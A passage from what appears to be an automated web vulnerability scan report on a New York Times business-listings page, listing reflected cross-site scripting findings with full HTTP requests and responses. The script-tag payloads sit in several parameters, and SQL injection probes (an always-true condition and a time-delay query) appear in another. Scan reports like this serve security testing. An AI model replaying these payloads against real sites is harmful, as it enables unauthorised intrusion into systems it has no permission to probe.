Content-Type: application/x-www-form-urlencoded
Host: listings.nytimes.com
Cookie: ASPSESSIONIDSCDTQSBS=CIDMHLFAMCCFKPLBBHALLAAF; ASPSESSIONIDACCRTTDT=EHDHDNGAFBGCHINIICBALKAB; ASPSESSIONIDSCBSSQAT=IBNKJLNDLPHGNPGDKFHLPIOI; ASPSESSIONIDCADQTTDT=ENMHKJGAMFJMFIFDNFGMGMOE; ASPSESSIONIDSABRQSAS=FELKNADAPLOANHOJMNHCBFEN; ASPSESSIONIDCCDTSTDT=JFOLPOGAMCPNEGJMKEMOJBLJ; ASPSESSIONIDSCCSTRAT=EDDDEGAAKEEOJFIKLGKLFKHO; ASPSESSIONIDCADTSTCS=KDIPGLGAPHDILBCBFEABDOGA
Accept-Encoding: gzip, deflate
Content-Length: 7048

AdTagCountyId=' OR '1'='1&AdTagPriceIndx=3&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&cid=999&DOrder=A&GroupId=3&intl=3&KeyWord=3&LastPage=40&LOrder=A&NOrder=A&Order=A&POrder=A&RegionId=3&
...[SNIP]...
25-569520%2c125-560929&sLsIdsZ=125-490731%2c125-505509%2c125-552073%2c125-512867%2c125-528218%2c125-528217%2c125-546102%2c125-564120%2c125-564628%2c125-528175&SoL=3&SOrder=A&Sort=D&strRegion=all+areas65e36<script>alert(1)</script>9f3b17ba795&strRegions=5%2bAll+Areas%3a%3a50000%2bAlabama%3a%3a51000%2bAlaska%3a%3a52000%2bArizona%3a%3a53000%2bArkansas%3a%3a54100%2bCalifornia%3a%3a55000%2bColorado%3a%3a56000%2bConnecticut%3a%3a57000%2bDelawa
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 07:49:22 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 7122
Content-Type: text/html
Cache-control: private

<h1>Form</h1>AdTagCountyId=' OR '1'='1&AdTagPriceIndx=3&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&cid=999&DOrder=A&GroupId=3&intl=3&KeyWord=3&LastPage=40&LOrder=A&NOrder=A&Order=A&POrder=
...[SNIP]...
125-569520%2c125-560929&sLsIdsZ=125-490731%2c125-505509%2c125-552073%2c125-512867%2c125-528218%2c125-528217%2c125-546102%2c125-564120%2c125-564628%2c125-528175&SoL=3&SOrder=A&Sort=D&strRegion=all+areas65e36<script>alert(1)</script>9f3b17ba795&strRegions=5%2bAll+Areas%3a%3a50000%2bAlabama%3a%3a51000%2bAlaska%3a%3a52000%2bArizona%3a%3a53000%2bArkansas%3a%3a54100%2bCalifornia%3a%3a55000%2bColorado%3a%3a56000%2bConnecticut%3a%3a57000%2bDelawar
...[SNIP]...

4.330. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [strRegion parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://listings.nytimes.com
Path:   /BusinessDirectory/List_Listings.asp

Issue detail

The value of the strRegion request parameter is copied into the HTML document as plain text between tags. The payload 6edbc<script>alert(1)</script>e639de09da051db2e was submitted in the strRegion parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /BusinessDirectory/List_Listings.asp?AdTagCountyId=&AdTagPriceIndx=&CategoryId=BIZDIR&ChangeEmail=&cid=999&DOrder=A&GroupId=&intl=&KeyWord=&LastPage=40&LOrder=A&NOrder=A&Order=A&POrder=A&RegionId=&ROrder=A&RSCount=2500&sLsIds0=80-N1011083%2c80-N1009073%2c80-N906131%2c80-N1011114%2c80-N1011021%2c80-N1008162%2c80-N1011102%2c80-N1009292%2c80-N1011022%2c80-N1010281&sLsIds1=80-N1010223%2c80-N1010192%2c80-N1011111%2c80-N1011051%2c80-N1010272%2c80-N1011071%2c80-N1009282%2c80-N1010211%2c80-N1011121%2c80-N1009242&sLsIds2=80-N1010218%2c20-1000297132_020%2c125-454145%2c125-500168%2c125-561603%2c125-557500%2c125-505633%2c125-502057%2c125-569378%2c125-451879&sLsIds3=125-563290%2c125-492069%2c125-487258%2c125-473954%2c125-516760%2c125-529105%2c125-529136%2c125-565044%2c125-452044%2c125-471500&sLsIds4=125-558791%2c125-555521%2c125-561463%2c125-549434%2c125-434068%2c125-530728%2c125-564022%2c125-557581%2c125-560091%2c125-563157&sLsIds5=125-491745%2c125-547950%2c125-509222%2c125-568138%2c125-557766%2c125-559177%2c125-537020%2c125-506111%2c125-560157%2c125-566240&sLsIds6=125-557675%2c125-551396%2c125-559267%2c125-533573%2c125-458445%2c125-538467%2c125-471913%2c125-482897%2c125-535950%2c125-499401&sLsIds7=125-486445%2c125-529496%2c125-429362%2c125-501989%2c125-502772%2c125-534073%2c125-530131%2c125-494155%2c125-517168%2c125-557932&sLsIds8=125-514452%2c125-541145%2c125-416753%2c125-444446%2c125-537604%2c125-502641%2c125-567841%2c125-564153%2c20-1000290506_030%2c125-570359&sLsIds9=125-539476%2c125-431610%2c125-442946%2c125-560310%2c125-497124%2c125-529949%2c125-568533%2c125-558371%2c125-553006%2c125-553112&sLsIdsA=125-560826%2c125-549432%2c125-552794%2c125-545063%2c125-552800%2c125-549795%2c125-552790%2c125-552796%2c125-551814%2c125-545983&sLsIdsAA=125-553610%2c125-518851%2c125-553607%2c125-556074%2c125-558240%2c125-499512%2c125-526065%2c125-462985%2c125-544762%2c125-560817&sLsIdsAB=125-522621%2c125-567005%2c125-364577%2c125-333056%2c125-565752%2c125-389754%2c125-405051%2c125-558962%2c125-441721%2c125-542506&sLsIdsAC=125-521855%2c125-495755%2c125-503906%2c125-565552%2c125-556750%2c125-475131%2c125-202650%2c125-510030%2c125-570191%2c125-475695&sLsIdsAD=125-555585%2c125-565528%2c125-520249%2c125-541247%2c125-556121%2c125-547008%2c125-568447%2c125-545194%2c125-512492%2c125-297311&sLsIdsB=125-551828%2c125-552791%2c125-552803%2c125-453304%2c125-552666%2c125-521482%2c125-521477%2c125-521479%2c125-488823%2c125-545359&sLsIdsC=125-527579%2c125-525464%2c125-527584%2c125-475581%2c125-510064%2c125-565038%2c125-554987%2c125-559008%2c125-525927%2c125-526128&sLsIdsD=125-526018%2c125-526144%2c125-529057%2c125-567748%2c125-526023%2c125-555190%2c125-559612%2c125-555175%2c125-554984%2c125-547837&sLsIdsE=125-547750%2c125-548054%2c125-525923%2c125-494906%2c125-531825%2c125-550469%2c125-567828%2c125-490106%2c125-566918%2c125-529618&sLsIdsF=125-463922%2c125-464100%2c125-488817%2c125-557391%2c125-522086%2c125-548195%2c125-553895%2c125-558344%2c125-564715%2c125-556870&sLsIdsG=125-554611%2c125-518058%2c125-532291%2c125-532292%2c125-482057%2c125-569094%2c125-555551%2c125-462478%2c125-469804%2c125-500828&sLsIdsH=125-504736%2c125-521946%2c125-517146%2c125-518850%2c125-524081%2c125-527129%2c125-527511%2c125-527508%2c125-528677%2c125-533450&sLsIdsI=125-540051%2c125-544122%2c125-549166%2c125-546131%2c125-550891%2c125-563445%2c125-560883%2c125-560309%2c125-565198%2c125-565179&sLsIdsJ=125-566478%2c125-566482%2c125-564856%2c125-565126%2c125-569444%2c125-531599%2c125-550866%2c125-560171%2c125-539587%2c125-567941&sLsIdsK=125-566956%2c125-513013%2c125-493766%2c125-521916%2c125-522018%2c125-554134%2c125-521507%2c125-521264%2c125-541992%2c125-521281&sLsIdsL=125-557904%2c125-565259%2c125-442451%2c125-551241%2c125-488296%2c125-568500%2c125-569515%2c125-548226%2c125-559444%2c125-565130&sLsIdsM=125-395953%2c125-491487%2c125-444457%2c125-464308%2c125-454440%2c125-454446%2c125-472602%2c125-418913%2c125-422194%2c125-561731&sLsIdsN=125-483424%2c125-471203%2c125-430646%2c125-436208%2c125-561736%2c125-394065%2c125-539553%2c125-454345%2c125-463424%2c125-470693&sLsIdsO=125-470909%2c125-481310%2c125-486834%2c125-490712%2c125-419767%2c125-497400%2c125-561713%2c125-496638%2c125-498359%2c125-499448&sLsIdsP=125-499423%2c125-499451%2c125-500061%2c125-500014%2c125-501827%2c125-504342%2c125-505889%2c125-505964%2c125-507572%2c125-561739&sLsIdsQ=125-512454%2c125-531166%2c125-510950%2c125-519482%2c125-550392%2c125-486912%2c125-560934%2c125-555722%2c125-562036%2c125-555902&sLsIdsR=125-493413%2c125-548107%2c125-566195%2c125-549209%2c125-496651%2c125-550801%2c125-551463%2c125-564528%2c125-544691%2c125-511935&sLsIdsS=125-513610%2c125-514528%2c125-514558%2c125-518925%2c125-534894%2c125-519626%2c125-521135%2c125-521146%2c125-531280%2c125-524507&sLsIdsT=125-524511%2c125-548214%2c125-523820%2c125-561740%2c125-535592%2c125-526559%2c125-561743%2c125-543364%2c125-526572%2c125-535768&sLsIdsU=125-561744%2c125-540337%2c125-530055%2c125-539271%2c125-533352%2c125-534277%2c125-554091%2c125-535784%2c125-536134%2c125-536168&sLsIdsV=125-537139%2c125-538939%2c125-537922%2c125-561745%2c125-540042%2c125-542538%2c125-561832%2c125-560772%2c125-561851%2c125-554861&sLsIdsW=125-545138%2c125-561852%2c125-561853%2c125-561855%2c125-561856%2c125-561860%2c125-553593%2c125-561861%2c125-557156%2c125-561863&sLsIdsX=125-560787%2c125-555117%2c125-555993%2c125-560783%2c125-558689%2c125-557187%2c125-557539%2c125-560788%2c125-560650%2c125-562241&sLsIdsY=125-564252%2c125-472625%2c125-565009%2c125-565408%2c125-565406%2c125-566364%2c125-566155%2c125-566429%2c125-569520%2c125-560929&sLsIdsZ=125-490731%2c125-505509%2c125-552073%2c125-512867%2c125-528218%2c125-528217%2c125-546102%2c125-564120%2c125-564628%2c125-528175&SoL=&SOrder=A&Sort=D&strRegion=all+areas6edbc<script>alert(1)</script>e639de09da051db2e&strRegions=5%2bAll+Areas%3a%3a50000%2bAlabama%3a%3a51000%2bAlaska%3a%3a52000%2bArizona%3a%3a53000%2bArkansas%3a%3a54100%2bCalifornia%3a%3a55000%2bColorado%3a%3a56000%2bConnecticut%3a%3a57000%2bDelaware%3a%3a59100%2bFlorida%3a%3a60000%2bGeorgia%3a%3a61000%2bHawaii%3a%3a62000%2bIdaho%3a%3a63000%2bIllinois%3a%3a64000%2bIndiana%3a%3a65000%2bIowa%3a%3a66000%2bKansas%3a%3a67000%2bKentucky%3a%3a68100%2bLouisiana%3a%3a69000%2bMaine%3a%3a70000%2bMaryland%3a%3a71200%2bMassachusetts%3a%3a72000%2bMichigan%3a%3a73000%2bMinnesota%3a%3a74000%2bMississippi%3a%3a75000%2bMissouri%3a%3a76000%2bMontana%3a%3a77000%2bNebraska%3a%3a78100%2bNevada%3a%3a79000%2bNew+Hampshire%3a%3a80100%2bNew+Jersey%3a%3a81000%2bNew+Mexico%3a%3a2022%2bNew+York%3a%3a82400%2bNew+York+City+Metro+Area%3a%3a83000%2bNorth+Carolina%3a%3a84000%2bNorth+Datoka%3a%3a85000%2bOhio%3a%3a86000%2bOklahoma%3a%3a87000%2bOregon%3a%3a88000%2bPennsylvania%3a%3a89000%2bRhode+Island%3a%3a90000%2bSouth+Carolina%3a%3a91000%2bSouth+Dakota%3a%3a92000%2bTennessee%3a%3a93000%2bTexas%3a%3a94000%2bUtah%3a%3a95000%2bVermont%3a%3a96000%2bVirginia%3a%3a97000%2bWashington%3a%3a58000%2bWashington+D.C.%3a%3a98000%2bWest+Virginia%3a%3a99000%2bWisconsin%3a%3a100000%2bWyoming%3a%3a&strSQL3=Execute+uspSearchListingsByLsIds+'BIZDIR'%2c&strStates=&SubCatId=&ThisPage=1 HTTP/1.1
Referer: http://listings.nytimes.com/BusinessDirectory/List_Listings.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322;)
Cache-Control: no-cache
Host: listings.nytimes.com
Cookie: ASPSESSIONIDSCDTQSBS=CIDMHLFAMCCFKPLBBHALLAAF
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 07:23:35 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 91594
Content-Type: text/html
Set-Cookie: ASPSESSIONIDACCRTTDT=MKDHDNGAHMALOOGEECKGENMF; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >

   
   <head>
       <meta http-equi
...[SNIP]...
<div id="searchBox-bottom">Your search for listings in all areas6edbc<script>alert(1)</script>e639de09da051db2e returned <b>
...[SNIP]...

4.331. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [strRegions parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://listings.nytimes.com
Path:   /BusinessDirectory/List_Listings.asp

Issue detail

The value of the strRegions request parameter is copied into the HTML document as plain text between tags. The payload 5caa4<script>alert(1)</script>aad934dff72d2fbe0 was submitted in the strRegions parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /BusinessDirectory/List_Listings.asp?AdTagCountyId=1;WAITFOR%20DELAY%20%270:0:25%27--&AdTagPriceIndx=3&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&cid=999&DOrder=A&GroupId=3&intl=3&KeyWord=3&LastPage=40&LOrder=A&NOrder=A&Order=A&POrder=A&RegionId=3&ROrder=A&RSCount=2500&sLsIds0=80-N1011083%2c80-N1009073%2c80-N906131%2c80-N1011114%2c80-N1011021%2c80-N1008162%2c80-N1011102%2c80-N1009292%2c80-N1011022%2c80-N1010281&sLsIds1=80-N1010223%2c80-N1010192%2c80-N1011111%2c80-N1011051%2c80-N1010272%2c80-N1011071%2c80-N1009282%2c80-N1010211%2c80-N1011121%2c80-N1009242&sLsIds2=80-N1010218%2c20-1000297132_020%2c125-454145%2c125-500168%2c125-561603%2c125-557500%2c125-505633%2c125-502057%2c125-569378%2c125-451879&sLsIds3=125-563290%2c125-492069%2c125-487258%2c125-473954%2c125-516760%2c125-529105%2c125-529136%2c125-565044%2c125-452044%2c125-471500&sLsIds4=125-558791%2c125-555521%2c125-561463%2c125-549434%2c125-434068%2c125-530728%2c125-564022%2c125-557581%2c125-560091%2c125-563157&sLsIds5=125-491745%2c125-547950%2c125-509222%2c125-568138%2c125-557766%2c125-559177%2c125-537020%2c125-506111%2c125-560157%2c125-566240&sLsIds6=125-557675%2c125-551396%2c125-559267%2c125-533573%2c125-458445%2c125-538467%2c125-471913%2c125-482897%2c125-535950%2c125-499401&sLsIds7=125-486445%2c125-529496%2c125-429362%2c125-501989%2c125-502772%2c125-534073%2c125-530131%2c125-494155%2c125-517168%2c125-557932&sLsIds8=125-514452%2c125-541145%2c125-416753%2c125-444446%2c125-537604%2c125-502641%2c125-567841%2c125-564153%2c20-1000290506_030%2c125-570359&sLsIds9=125-539476%2c125-431610%2c125-442946%2c125-560310%2c125-497124%2c125-529949%2c125-568533%2c125-558371%2c125-553006%2c125-553112&sLsIdsA=125-560826%2c125-549432%2c125-552794%2c125-545063%2c125-552800%2c125-549795%2c125-552790%2c125-552796%2c125-551814%2c125-545983&sLsIdsAA=125-553610%2c125-518851%2c125-553607%2c125-556074%2c125-558240%2c125-499512%2c125-526065%2c125-462985%2c125-544762%2c125-560817&sLsIdsAB=125-522621%2c125-567005%2c125-364577%2c125-333056%2c125-565752%2c125-389754%2c125-405051%2c125-558962%2c125-441721%2c125-542506&sLsIdsAC=125-521855%2c125-495755%2c125-503906%2c125-565552%2c125-556750%2c125-475131%2c125-202650%2c125-510030%2c125-570191%2c125-475695&sLsIdsAD=125-555585%2c125-565528%2c125-520249%2c125-541247%2c125-556121%2c125-547008%2c125-568447%2c125-545194%2c125-512492%2c125-297311&sLsIdsB=125-551828%2c125-552791%2c125-552803%2c125-453304%2c125-552666%2c125-521482%2c125-521477%2c125-521479%2c125-488823%2c125-545359&sLsIdsC=125-527579%2c125-525464%2c125-527584%2c125-475581%2c125-510064%2c125-565038%2c125-554987%2c125-559008%2c125-525927%2c125-526128&sLsIdsD=125-526018%2c125-526144%2c125-529057%2c125-567748%2c125-526023%2c125-555190%2c125-559612%2c125-555175%2c125-554984%2c125-547837&sLsIdsE=125-547750%2c125-548054%2c125-525923%2c125-494906%2c125-531825%2c125-550469%2c125-567828%2c125-490106%2c125-566918%2c125-529618&sLsIdsF=125-463922%2c125-464100%2c125-488817%2c125-557391%2c125-522086%2c125-548195%2c125-553895%2c125-558344%2c125-564715%2c125-556870&sLsIdsG=125-554611%2c125-518058%2c125-532291%2c125-532292%2c125-482057%2c125-569094%2c125-555551%2c125-462478%2c125-469804%2c125-500828&sLsIdsH=125-504736%2c125-521946%2c125-517146%2c125-518850%2c125-524081%2c125-527129%2c125-527511%2c125-527508%2c125-528677%2c125-533450&sLsIdsI=125-540051%2c125-544122%2c125-549166%2c125-546131%2c125-550891%2c125-563445%2c125-560883%2c125-560309%2c125-565198%2c125-565179&sLsIdsJ=125-566478%2c125-566482%2c125-564856%2c125-565126%2c125-569444%2c125-531599%2c125-550866%2c125-560171%2c125-539587%2c125-567941&sLsIdsK=125-566956%2c125-513013%2c125-493766%2c125-521916%2c125-522018%2c125-554134%2c125-521507%2c125-521264%2c125-541992%2c125-521281&sLsIdsL=125-557904%2c125-565259%2c125-442451%2c125-551241%2c125-488296%2c125-568500%2c125-569515%2c125-548226%2c125-559444%2c125-565130&sLsIdsM=125-395953%2c125-491487%2c125-444457%2c125-464308%2c125-454440%2c125-454446%2c125-472602%2c125-418913%2c125-422194%2c125-561731&sLsIdsN=125-483424%2c125-471203%2c125-430646%2c125-436208%2c125-561736%2c125-394065%2c125-539553%2c125-454345%2c125-463424%2c125-470693&sLsIdsO=125-470909%2c125-481310%2c125-486834%2c125-490712%2c125-419767%2c125-497400%2c125-561713%2c125-496638%2c125-498359%2c125-499448&sLsIdsP=125-499423%2c125-499451%2c125-500061%2c125-500014%2c125-501827%2c125-504342%2c125-505889%2c125-505964%2c125-507572%2c125-561739&sLsIdsQ=125-512454%2c125-531166%2c125-510950%2c125-519482%2c125-550392%2c125-486912%2c125-560934%2c125-555722%2c125-562036%2c125-555902&sLsIdsR=125-493413%2c125-548107%2c125-566195%2c125-549209%2c125-496651%2c125-550801%2c125-551463%2c125-564528%2c125-544691%2c125-511935&sLsIdsS=125-513610%2c125-514528%2c125-514558%2c125-518925%2c125-534894%2c125-519626%2c125-521135%2c125-521146%2c125-531280%2c125-524507&sLsIdsT=125-524511%2c125-548214%2c125-523820%2c125-561740%2c125-535592%2c125-526559%2c125-561743%2c125-543364%2c125-526572%2c125-535768&sLsIdsU=125-561744%2c125-540337%2c125-530055%2c125-539271%2c125-533352%2c125-534277%2c125-554091%2c125-535784%2c125-536134%2c125-536168&sLsIdsV=125-537139%2c125-538939%2c125-537922%2c125-561745%2c125-540042%2c125-542538%2c125-561832%2c125-560772%2c125-561851%2c125-554861&sLsIdsW=125-545138%2c125-561852%2c125-561853%2c125-561855%2c125-561856%2c125-561860%2c125-553593%2c125-561861%2c125-557156%2c125-561863&sLsIdsX=125-560787%2c125-555117%2c125-555993%2c125-560783%2c125-558689%2c125-557187%2c125-557539%2c125-560788%2c125-560650%2c125-562241&sLsIdsY=125-564252%2c125-472625%2c125-565009%2c125-565408%2c125-565406%2c125-566364%2c125-566155%2c125-566429%2c125-569520%2c125-560929&sLsIdsZ=125-490731%2c125-505509%2c125-552073%2c125-512867%2c125-528218%2c125-528217%2c125-546102%2c125-564120%2c125-564628%2c125-528175&SoL=3&SOrder=A&Sort=D&strRegion=all+areas&strRegions=5%2bAll+Areas%3a%3a50000%2bAlabama%3a%3a51000%2bAlaska%3a%3a52000%2bArizona%3a%3a53000%2bArkansas%3a%3a54100%2bCalifornia%3a%3a55000%2bColorado%3a%3a56000%2bConnecticut%3a%3a57000%2bDelaware%3a%3a59100%2bFlorida%3a%3a60000%2bGeorgia%3a%3a61000%2bHawaii%3a%3a62000%2bIdaho%3a%3a63000%2bIllinois%3a%3a64000%2bIndiana%3a%3a65000%2bIowa%3a%3a66000%2bKansas%3a%3a67000%2bKentucky%3a%3a68100%2bLouisiana%3a%3a69000%2bMaine%3a%3a70000%2bMaryland%3a%3a71200%2bMassachusetts%3a%3a72000%2bMichigan%3a%3a73000%2bMinnesota%3a%3a74000%2bMississippi%3a%3a75000%2bMissouri%3a%3a76000%2bMontana%3a%3a77000%2bNebraska%3a%3a78100%2bNevada%3a%3a79000%2bNew+Hampshire%3a%3a80100%2bNew+Jersey%3a%3a81000%2bNew+Mexico%3a%3a2022%2bNew+York%3a%3a82400%2bNew+York+City+Metro+Area%3a%3a83000%2bNorth+Carolina%3a%3a84000%2bNorth+Datoka%3a%3a85000%2bOhio%3a%3a86000%2bOklahoma%3a%3a87000%2bOregon%3a%3a88000%2bPennsylvania%3a%3a89000%2bRhode+Island%3a%3a90000%2bSouth+Carolina%3a%3a91000%2bSouth+Dakota%3a%3a92000%2bTennessee%3a%3a93000%2bTexas%3a%3a94000%2bUtah%3a%3a95000%2bVermont%3a%3a96000%2bVirginia%3a%3a97000%2bWashington%3a%3a58000%2bWashington+D.C.%3a%3a98000%2bWest+Virginia%3a%3a99000%2bWisconsin%3a%3a100000%2bWyoming%3a%3a5caa4<script>alert(1)</script>aad934dff72d2fbe0&strSQL3=Execute+uspSearchListingsByLsIds+'BIZDIR'%2c&strStates=3&SubCatId=3&ThisPage=1 HTTP/1.1
Referer: http://listings.nytimes.com/BusinessDirectory/List_Listings.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322;)
Cache-Control: no-cache
Host: listings.nytimes.com
Cookie: ASPSESSIONIDSCDTQSBS=CIDMHLFAMCCFKPLBBHALLAAF; ASPSESSIONIDACCRTTDT=EHDHDNGAFBGCHINIICBALKAB; ASPSESSIONIDSCBSSQAT=IBNKJLNDLPHGNPGDKFHLPIOI; ASPSESSIONIDCADQTTDT=ENMHKJGAMFJMFIFDNFGMGMOE; ASPSESSIONIDSABRQSAS=FELKNADAPLOANHOJMNHCBFEN; ASPSESSIONIDCCDTSTDT=JFOLPOGAMCPNEGJMKEMOJBLJ; ASPSESSIONIDSCCSTRAT=EDDDEGAAKEEOJFIKLGKLFKHO; ASPSESSIONIDCADTSTCS=JDIPGLGAGKINHNJPBNGFIHLA
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 15:33:16 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 7151
Content-Type: text/html
Cache-control: private

<h1>Form</h1><h1>QueryString</h1>AdTagCountyId=1;WAITFOR%20DELAY%20%270:0:25%27--&AdTagPriceIndx=3&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&cid=999&DOrder=A&GroupId=3&intl=3&KeyWord=3&La
...[SNIP]...
0%2bTexas%3a%3a94000%2bUtah%3a%3a95000%2bVermont%3a%3a96000%2bVirginia%3a%3a97000%2bWashington%3a%3a58000%2bWashington+D.C.%3a%3a98000%2bWest+Virginia%3a%3a99000%2bWisconsin%3a%3a100000%2bWyoming%3a%3a5caa4<script>alert(1)</script>aad934dff72d2fbe0&strSQL3=Execute+uspSearchListingsByLsIds+'BIZDIR'%2c&strStates=3&SubCatId=3&ThisPage=1

4.332. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [strRegions parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://listings.nytimes.com
Path:   /BusinessDirectory/List_Listings.asp

Issue detail

The value of the strRegions request parameter is copied into the HTML document as plain text between tags. The payload 6d8ea<script>alert(1)</script>b872c0d31f4 was submitted in the strRegions parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /BusinessDirectory/List_Listings.asp HTTP/1.1
Referer: http://listings.nytimes.com/BusinessDirectory/List_Listings.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322;)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: listings.nytimes.com
Cookie: ASPSESSIONIDSCDTQSBS=CIDMHLFAMCCFKPLBBHALLAAF; ASPSESSIONIDACCRTTDT=EHDHDNGAFBGCHINIICBALKAB; ASPSESSIONIDSCBSSQAT=IBNKJLNDLPHGNPGDKFHLPIOI; ASPSESSIONIDCADQTTDT=ENMHKJGAMFJMFIFDNFGMGMOE; ASPSESSIONIDSABRQSAS=FELKNADAPLOANHOJMNHCBFEN; ASPSESSIONIDCCDTSTDT=JFOLPOGAMCPNEGJMKEMOJBLJ; ASPSESSIONIDSCCSTRAT=EDDDEGAAKEEOJFIKLGKLFKHO; ASPSESSIONIDCADTSTCS=KDIPGLGAPHDILBCBFEABDOGA
Accept-Encoding: gzip, deflate
Content-Length: 7048

AdTagCountyId=' OR '1'='1&AdTagPriceIndx=3&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&cid=999&DOrder=A&GroupId=3&intl=3&KeyWord=3&LastPage=40&LOrder=A&NOrder=A&Order=A&POrder=A&RegionId=3&
...[SNIP]...
%2bTexas%3a%3a94000%2bUtah%3a%3a95000%2bVermont%3a%3a96000%2bVirginia%3a%3a97000%2bWashington%3a%3a58000%2bWashington+D.C.%3a%3a98000%2bWest+Virginia%3a%3a99000%2bWisconsin%3a%3a100000%2bWyoming%3a%3a6d8ea<script>alert(1)</script>b872c0d31f4&strSQL3=Execute+uspSearchListingsByLsIds+'BIZDIR'%2c&strStates=3&SubCatId=3&ThisPage=1

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 07:49:25 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 7122
Content-Type: text/html
Cache-control: private

<h1>Form</h1>AdTagCountyId=' OR '1'='1&AdTagPriceIndx=3&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&cid=999&DOrder=A&GroupId=3&intl=3&KeyWord=3&LastPage=40&LOrder=A&NOrder=A&Order=A&POrder=
...[SNIP]...
0%2bTexas%3a%3a94000%2bUtah%3a%3a95000%2bVermont%3a%3a96000%2bVirginia%3a%3a97000%2bWashington%3a%3a58000%2bWashington+D.C.%3a%3a98000%2bWest+Virginia%3a%3a99000%2bWisconsin%3a%3a100000%2bWyoming%3a%3a6d8ea<script>alert(1)</script>b872c0d31f4&strSQL3=Execute+uspSearchListingsByLsIds+'BIZDIR'%2c&strStates=3&SubCatId=3&ThisPage=1<h1>
...[SNIP]...

4.333. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [strSQL3 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://listings.nytimes.com
Path:   /BusinessDirectory/List_Listings.asp

Issue detail

The value of the strSQL3 request parameter is copied into the HTML document as plain text between tags. The payload ca5d6<script>alert(1)</script>f1112cfe0af5c01fb was submitted in the strSQL3 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /BusinessDirectory/List_Listings.asp?AdTagCountyId=1;WAITFOR%20DELAY%20%270:0:25%27--&AdTagPriceIndx=3&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&cid=999&DOrder=A&GroupId=3&intl=3&KeyWord=3&LastPage=40&LOrder=A&NOrder=A&Order=A&POrder=A&RegionId=3&ROrder=A&RSCount=2500&sLsIds0=80-N1011083%2c80-N1009073%2c80-N906131%2c80-N1011114%2c80-N1011021%2c80-N1008162%2c80-N1011102%2c80-N1009292%2c80-N1011022%2c80-N1010281&sLsIds1=80-N1010223%2c80-N1010192%2c80-N1011111%2c80-N1011051%2c80-N1010272%2c80-N1011071%2c80-N1009282%2c80-N1010211%2c80-N1011121%2c80-N1009242&sLsIds2=80-N1010218%2c20-1000297132_020%2c125-454145%2c125-500168%2c125-561603%2c125-557500%2c125-505633%2c125-502057%2c125-569378%2c125-451879&sLsIds3=125-563290%2c125-492069%2c125-487258%2c125-473954%2c125-516760%2c125-529105%2c125-529136%2c125-565044%2c125-452044%2c125-471500&sLsIds4=125-558791%2c125-555521%2c125-561463%2c125-549434%2c125-434068%2c125-530728%2c125-564022%2c125-557581%2c125-560091%2c125-563157&sLsIds5=125-491745%2c125-547950%2c125-509222%2c125-568138%2c125-557766%2c125-559177%2c125-537020%2c125-506111%2c125-560157%2c125-566240&sLsIds6=125-557675%2c125-551396%2c125-559267%2c125-533573%2c125-458445%2c125-538467%2c125-471913%2c125-482897%2c125-535950%2c125-499401&sLsIds7=125-486445%2c125-529496%2c125-429362%2c125-501989%2c125-502772%2c125-534073%2c125-530131%2c125-494155%2c125-517168%2c125-557932&sLsIds8=125-514452%2c125-541145%2c125-416753%2c125-444446%2c125-537604%2c125-502641%2c125-567841%2c125-564153%2c20-1000290506_030%2c125-570359&sLsIds9=125-539476%2c125-431610%2c125-442946%2c125-560310%2c125-497124%2c125-529949%2c125-568533%2c125-558371%2c125-553006%2c125-553112&sLsIdsA=125-560826%2c125-549432%2c125-552794%2c125-545063%2c125-552800%2c125-549795%2c125-552790%2c125-552796%2c125-551814%2c125-545983&sLsIdsAA=125-553610%2c125-518851%2c125-553607%2c125-556074%2c125-558240%2c125-499512%2c125-526065%2c125-462985%2c125-544762%2c125-560817&sLsIdsAB=125-522621%2c125-567005%2c125-364577%2c125-333056%2c125-565752%2c125-389754%2c125-405051%2c125-5